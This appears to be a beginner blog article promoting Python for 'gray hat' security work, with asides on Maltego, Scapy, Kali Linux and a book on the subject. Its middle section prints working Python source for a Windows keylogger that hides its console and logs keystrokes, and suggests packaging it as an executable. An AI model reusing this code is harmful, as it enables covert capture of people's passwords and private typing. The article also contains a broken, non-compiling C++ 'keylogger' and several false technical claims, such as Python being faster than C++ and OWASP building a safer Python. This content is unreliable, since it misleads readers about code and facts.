Updated June 12, 2023
Introduction to Gray Hat Python
So, two years back, I was researching programming languages; I started reading about C, C++, Assembly, Python, and Ruby. I wanted to become an expert in Cyber Security. So, I started learning as much as I could. I started with C, C++, and C# being the basics, and after learning and compiling lots of programs and viruses, I finally started learning Kali Linux. It is an operating system for penetration testing for those who don’t know what Kali Linux is. So, I was going on with my studies, and I saw that most of the programs, viruses, and Trojans were compiled in Python, their base being Ruby.
So, I stopped my studies for the time being and started learning Python or, being precise, Gray Hat Python and tadaa… It was extremely easy compared to C, C#, or any other language I understood. I finally learned why Python was the most useful language and how it became famous.
Today, I will discuss how Python transformed into Gray Hat Python and why it is so extensively useful that even Google and YouTube use it in their database to give as accurate search results as possible.
Starting, Python is a high-level programming language, which means its syntaxes are extremely easy to read, even for beginners. If you are new to programming, this would be the language I would suggest you start with. Let me give you an example:
How does it look in Different Programming Languages?
Explanation using different programming languages as below:
This is how it looks in C
#include<stdio.h>
int main()
{
printf("Hello world\n");
return 0;
}
This is how it looks in Java
class HelloWorld
{
public static void main (String args[])
{
System.out.println ("Hello World");
}
}
This is how it looks like in Python(v2.7)
print ("Hello World")
Simple? Yes, it is. So, Python was easy to write and understand and very compact. So, you might wonder how this led to Gray Hat Python.
Python vs Gray Hat Python
So, what exactly is Gray Hat Python? Why is it so different from our normal Python? The thing is, Gray Hat Python is nothing but programs written in Python by Hackers, Network-Stress testers, and Reverse Engineers to create or crack a program. It’s useful to Secure or create security-breaking software. But Gray Hat is useful because it is not beneficial or user software.
It can easily be useful to test the limitations of a secure environment or break into a safe environment. That’s what Gray Hat means. And it’s far easier to do it in Python than in C, C++, or Java. Thus the name Gray Hat Python. A few examples I can think of are:
• Writing key-loggers (for Hackers and Pentesters)
• Writing Security Shell Scripts (For Network Administrators)
• Writing an Automated IDS (Intrusion Detection System for Security Engineers)
So, now you know why and how Gray Hat Python is useful. To elaborate on this, let me give you some detailed examples.
You may have heard of Google App Engine. Google App Engine was originally designed in Python before it was ported on. Google App is a good example of a program written in Python because it allows building web applications using its high-end rich collection of libraries, tools, and framework.
Have you ever wondered why searching for something on Google is so easy? Most of the time, you get search results that are 80% accurate. This is because Python is extremely flexible, works at high speed, and the databases are much more compact though it stores ‘n’ number of information. Python is so extensible that even YouTube uses it for purposes like viewing the video, controlling templates, administering videos, accessing canonical data, and many more.
Google has its crawlers and spiders, which gather data as soon as it is uploaded on the web, no matter where or how secure it is. One just needs proper inspiration, time, and knowledge to gather this information.
Google searches were previously based on Python, which later changed to C++ for speed optimization because Google crawlers crawl many pages per second, and each takes a few minutes to crawl successfully. Python, at present, is much faster than C++, but that wasn’t the same case a few decades ago.
Google quoted a famous quote: –
“Python where we can, C++ where we must.”
So, you might be wondering how this can be useful for Hacking, Pentesting, and Network Security. I beg to differ. Suppose you could create a program that is 70%-80% accurate in giving efficient search results. In that case, you can probably build an application that can connect websites, search smartly and build a person’s profile, which Individual Black Hats can rather use for malicious purposes. Leave Individuals aside; one is smart enough and can easily create an application for building a company’s profile, its whole tree from its root to whatever you can think of…
Information Gathering via Maltego
You may be thinking that I am exaggerating a bit. Nope, I am NOT!
Think of examples like Maltego. Maltego is software, or I can better re-phrase it as an open-source forensics application built to gather information and build profiles of people, companies, and other corporate agencies.
One just needs to enter pertinent data into the app, and the rest of the things, like linking emails, people, groups of people, and even determining internet infrastructures such as Domains, DNS names, Netblocks, and IP addresses, can be connected and interconnected using this open-source intelligence.
For more information, visit to know What is Maltego?
So, if access to “Secret information” determines your success, then Maltego can help you discover it. Maltego is partially written in Python and uses Java, which is a great language.
So much to quote about security from Google. To be more precise, Google is the least way to keep yourself anonymous on the web. It doesn’t matter whether you use incognito or www.duckduckgo.com from Chrome. Because, ultimately, everything is updated on the web. The point here is it’s not about invulnerability; it’s about being vulnerable. One cannot completely wipe oneself off the Internet. But one can keep as little info on the Web as possible.
Python is not just a language; it’s a scripting language. Scripting languages allow you to write and modify your tools when you need something more custom. These Network Security tools depend on scripting language heavily for extensibility. For Example, let’s Take Scapy.
Scapy is purely written in Python. It is a powerful interactive packet manipulation tool. It can generate fake packets, scan networks, and even sniff packets.
Find detailed information about What is Scapy?
Now, these are complex programs written by advanced programmers. Let’s see how simple it is to write a program in Python that people with some good programming basics can easily understand.
How has keylogger written in Python?
Following is a code for a keylogger written in Python:
#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window,0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file,"a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)
proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input
So, this is far more than easy if you ask me. I have simply added the modules py hook, Pythoncom, win32gui, and win32console, which you can easily download from the SourceForge website, and I have mentioned the comments using the hashtag. But if I have to write the same program in C++, let’s see how hard that can be.
This is a program written in C++.
#include<iostream.h>
#include<conio.h>
int main(int argc, char ** agrv){
using namepace std; /*Easier*/
char std::vector input_STRUCT = ["S", "T", "O"];
char std::vector input_STRUCT_1 = ["P", ""];
char std::vector input_STRUCT_2 = ["L", "O", "O", "K", "I", "N", "G"];
char std::vector input_STRUCT_3 = ["", "F", "O", "R"];
char std::vector input_STRUCT_4 = ["M", "A", "L", "W"];
char std::vector input_STRUCT_5 = ["A", "R", "E"];
ostream os("C:\users\keylogger.txt");
int i;
for( i = 0; i <=2; i++){
os << input_STRUCT[i];
for(;i <= 1000000 ;i++){
}
}
for( i=0; i<=1;i++){
os << input_STRING_1[i];
for(;i <= 1000000 ;i++){
}
}
for(i=0; i<=6; i++) {
os << input_STRING_2 [i];
for(; i <= 1000000 ; i++){
}
for(i=0; i<=3;i++){
os << input_STRING_3[i];
for(; i <= 1000000 ;i++){
}
}
for(i=0; i<=3; i++){
os << input_STRING_4[i];
for(;i <= 1000000 ; i++){
}
}
for(i=0; i<=2; i++){
os << input_STRING_5[i];
for(;i <= 1000000 ; i++){
}
}
os.close();
istream is (" C:\users\keylogger.txt ");
cout << is;
return 0;
}
So, this is pretty large as compared to Python. And if we talk about efficiency, then Python can be easily compiled into an executable without any effort using py2exe software. Whereas if I talk about C++, then, frankly speaking, this code is a joke. Besides, this code is far from easy for a beginner to understand. To write a proper key logger, one must write a DLL that implements the WH_KEYBOARD hook.
Open Source Hacking
Now, this takes care of Black Hat hackers, which, to be more precise, are the people who intend to destroy and manipulate data for their own needs. Regarding security concerns, Python is also useful for White Hat hackers who intend to save society from malicious hackers’ attacks. If you want to develop a career or at least want to learn Python for security research, then you can surely get in deep with OWASP, BRO, or Quick NIX Secure Script.
OWASP is an Open Web Application Security Project. OWASP aims to create a more secure version of Python that makes it easier for security professionals and developers to write software less prone to hackers’ attacks. It is related to Black-Box analysis, identifying and addressing security-related issues that can affect Python’s interactive interpreter.
BRO is a network security and traffic monitor program, whereas Quick NIX is useful to harden and secure file ownership on the fly.
Since we are speaking of Security, let’s talk about an operating system partially based on Python. Python works great with UNIX, LINUX and Debian. One of the most famous operating systems was Backtrack 5. There were different versions. It was specifically for PenTesting. Later on, the people at Offensive Security thought that Backtrack needed a reboot ‘cause most of the tools were either not working properly or were not supported.
Later, they released Kali Linux, which was based on Debian. And most of its framework is either in Ruby or Python. Ruby, too is an awesome scripting language. But I would always prefer Python over that because Python has a more diverse community with Linux, and it’s more direct and easy to debug. Whereas Ruby has many features and quickly adapts to its surrounding environment, it can be hard to debug and read and more sophisticated than Python.
The best example would be comparing Apple vs Linux or iPhone vs Android. Apple is rich in resources, extremely smooth, and more biased toward beginners. Whereas Linux/Android is more User-friendly, a bit laggy, and can be a headache sometimes if you don’t know how to configure or maintain it.
Justin Seitz even has a book based on Python Gray Hat Hacking. It deals specifically with automating tedious reverse engineering and security-related tasks, designing your own debugger, library, and DLL injection, sniffing secure traffic over an encrypted session, and using Immunity debugger, Sulley, and many more. It’s an awesome book; it doesn’t matter whether you are a beginner or an expert; you will always learn something or other things every time you read it.
Conclusion
So, if you are a beginner, Python would be the right choice for you to start with as your first programming security testing language.
Just remember one thing in the end: Gray Hat Python is not just a language; it’s a way to do things properly and quickly.
Related Articles
We hope that this EDUCBA information on “Gray Hat Python” was beneficial to you. You can view EDUCBA’s recommended articles for more information.